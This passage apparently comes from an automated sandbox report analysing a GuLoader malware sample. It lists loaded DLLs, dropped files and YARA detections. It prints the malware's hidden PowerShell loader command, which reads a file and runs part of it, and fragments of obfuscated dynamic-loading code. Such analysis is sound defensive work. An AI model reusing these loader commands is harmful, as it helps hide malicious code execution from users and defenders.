      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: av8XPPpdBc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: e.pdbd< source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.2530768595.00000000094D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.3393778928.0000000001764000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fontange93 $Swooping $Merritt), (Sultekosts @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Styled = [AppDomain]::CurrentDomain.GetAssemblies()$global:Conj
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Oplgninger)), $Enhedsfrontens).DefineDynamicModule($hypacusia, $false).DefineType($Erlan, $Afprvningsstrategiers, [System.MulticastDel
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0766B140 push ss; iretd 2_2_0766B144
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_076670DA push edi; iretd 2_2_076670DB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0766B0A3 push cs; iretd 2_2_0766B0AA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B29F9 push 8BD38B50h; iretd 2_2_093B29FE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B20B2 pushfd ; ret 2_2_093B20BF
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile created: C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
